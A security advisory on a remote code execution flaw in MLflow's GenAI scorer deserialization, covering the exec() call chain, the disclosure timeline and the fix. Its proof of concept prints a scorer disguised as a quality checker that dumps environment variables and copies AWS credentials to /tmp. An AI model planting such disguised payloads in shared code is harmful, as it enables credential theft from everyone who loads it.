Remote Code Execution via GenAI Scorer Deserialization in MLflow
Author: Evan Harris
Risk: High
Affected Component: MLflow GenAI scorers (mlflow/mlflow)
TL;DR
MLflow’s GenAI scorer deserialization mechanism contained a remote code execution vulnerability. The recreate_function() utility in scorer_utils.py passed attacker-controlled scorer data (stored in the MLflow tracking database) directly to Python’s exec(). A malicious scorer registered by one user executes arbitrary code on the machine of anyone who later retrieves and runs it, enabling a supply chain attack across an entire ML team. We reported the issue to the MLflow maintainers, who fixed it by restricting custom scorer registration and loading to Databricks-controlled environments. Users should upgrade to MLflow 3.5.2 or later.
Background
MLflow’s GenAI module lets teams define scorers, Python functions that evaluate the quality of LLM outputs (length checks, content safety, formatting, and so on). Scorers can be authored with the @scorer decorator, registered against an experiment, and later retrieved by name with get_scorer() so that colleagues can reuse a shared evaluation.
To make this work, MLflow serializes the scorer’s underlying function and stores it in the tracking database. When the scorer is retrieved, MLflow reconstructs the function from that stored data. The reconstruction step is where the vulnerability lived: the serialized source was reconstituted by calling Python’s exec(), which runs whatever code it is given. Because the stored data is fully attacker-controlled, anyone who could register a scorer could plant code that would execute inside another user’s process.
Overview
The vulnerability is triggered along a single deserialization call chain that ends in exec():
%%{init: {'themeVariables': {'fontSize': '18px'}}}%%
flowchart TD
A[Attacker authors malicious @scorer
with payload hidden in the body] --> B[Distributed via PyPI, GitHub,
or shared Python module]
B --> C[Victim imports and registers
the scorer with MLflow]
C --> D[Serialized function stored in
tracking database]
D --> E["get_scorer(name, experiment_id)
registry.py:571"]
E --> F["Scorer.model_validate()
base.py:222"]
F --> G["_reconstruct_decorator_scorer()
base.py:298"]
G --> H["recreate_function()
scorer_utils.py:131"]
H --> I["exec(attacker_source)"]
I --> J[Remote Code Execution
in victim process]
style A fill:#ffebee
style B fill:#ffebee
style C fill:#fff3e0
style D fill:#fff9c4
style E fill:#fff9c4
style F fill:#fff9c4
style G fill:#fff9c4
style H fill:#ffcdd2
style I fill:#ffcdd2
style J fill:#ffcdd2
The call chain is:
mlflow.genai.scorers.get_scorer()
→ Scorer.model_validate() # registry.py:571
→ _reconstruct_decorator_scorer() # base.py:222
→ recreate_function() # base.py:298
→ exec() # scorer_utils.py:131 ← REMOTE CODE EXECUTION
Attack Scenario
- An attacker authors a scorer that looks legitimate (a “quality checker” with a believable docstring) but hides a malicious payload in the function body.
- The attacker distributes the scorer through a channel the victim trusts: a PyPI package, a team GitHub repository, or a shared Python module.
- A victim imports the scorer and registers it with MLflow. The serialized function is written to the tracking database.
- Later, possibly on a different machine, by a different team member, days or weeks afterward, someone retrieves the scorer with
get_scorer()and uses it. - During deserialization,
recreate_function()callsexec()on the stored source. The hidden payload runs with the full privileges of the victim’s process.
Because the trigger is decoupled in time and across users from the registration, the attack is silent: a single malicious scorer registered once can compromise everyone on the team who later pulls it.
Proof of Concept
The malicious scorer below presents itself as an output quality checker. The body contains a payload that drops a marker file, exfiltrates environment variables, and harvests AWS credentials before returning a plausible result to avoid suspicion:
from mlflow.genai.scorers import scorer
@scorer
def quality_checker(outputs):
"""
Quality checker for LLM outputs.
Validates that outputs meet quality standards:
- Minimum length requirements
- No offensive content
- Proper formatting
Returns:
bool: True if output passes quality checks
"""
# MALICIOUS PAYLOAD HIDDEN BELOW
import os
# Create proof file
os.system('touch /tmp/rce_supply_chain.txt')
os.system('echo "COMPROMISED VIA SUPPLY CHAIN" > /tmp/rce_supply_chain.txt')
# Exfiltrate environment variables
env_data = dict(os.environ)
with open('/tmp/exfiltrated_env.txt', 'w') as f:
f.write("EXFILTRATED ENVIRONMENT:\n")
for key, value in list(env_data.items())[:10]:
f.write(f'{key}={value}\n')
# Harvest AWS credentials
aws_creds_path = os.path.expanduser('~/.aws/credentials')
if os.path.exists(aws_creds_path):
with open(aws_creds_path, 'r') as f_in:
with open('/tmp/aws_credentials_stolen.txt', 'w') as f_out:
f_out.write(f_in.read())
# Return a valid result to avoid suspicion
return len(outputs) > 10
The victim retrieves the shared scorer as they normally would:
import mlflow
from mlflow.genai.scorers import get_scorer
# Different machine, different user, or days later
mlflow.set_tracking_uri("sqlite:///mlflow_tracking/mlflow.db")
scorer = get_scorer(name="quality_checker_v1", experiment_id="1")
And then uses it:
result = scorer(outputs="This is test output to evaluate")
At this point the RCE fires and the payload runs in the victim’s process.
Impact
Depending on the payload carried in the untrusted scorer data, an attacker can:
- Execute arbitrary Python code with the full privileges of the victim’s process
- Exfiltrate sensitive data such as credentials, environment variables, and source code
- Harvest credentials from common locations (AWS, Docker, SSH)
- Establish persistence on the victim’s machine
- Perform lateral movement and network reconnaissance
The impact is amplified by the supply chain nature of the flaw: one malicious scorer registered by a single team member can compromise every user who later retrieves it, with the trigger occurring silently long after registration.
MLflow Response
After we disclosed the issue through MLflow’s coordinated disclosure process, the maintainers addressed it in pull request #18493.
Rather than attempting to sandbox or validate the deserialized source, the maintainers removed the dangerous capability outside of controlled environments: registering and loading custom code-based scorers is now restricted to Databricks tracking environments, where the set of users who can upload scorers is controlled. Users on other tracking backends are directed toward safer alternatives such as built-in scorers and make_judge()-based scorers, which do not require arbitrary code execution during deserialization.
The fix shipped in MLflow 3.5.2.
Recommendations
For End Users
- Upgrade to MLflow 3.5.2 or later.
- Only register and retrieve custom scorers from sources you fully trust.
- Treat scorer data in a tracking database as untrusted code, not inert data. Anyone who can write to the tracking store can run code on every consumer.
- Prefer built-in scorers or
make_judge()scorers, which do not execute arbitrary code during deserialization. - Restrict write access to shared tracking databases and review scorers before reuse across a team.
Timeline
| Date | Event |
|---|---|
| October 20, 2025 | Vulnerability reported to MLflow maintainers via coordinated disclosure (issue #18404) |
| October 24, 2025 | MLflow merges fix (PR #18493), released in v3.5.2 |
| January 8, 2026 | huntr marked the issue as a duplicate |
| June 8, 2026 | Public disclosure |
Stay Ahead of AI Security Threats
Get exclusive insights on AI agent vulnerabilities, MCP security research, and critical advisories delivered to your inbox.
No spam. Unsubscribe anytime.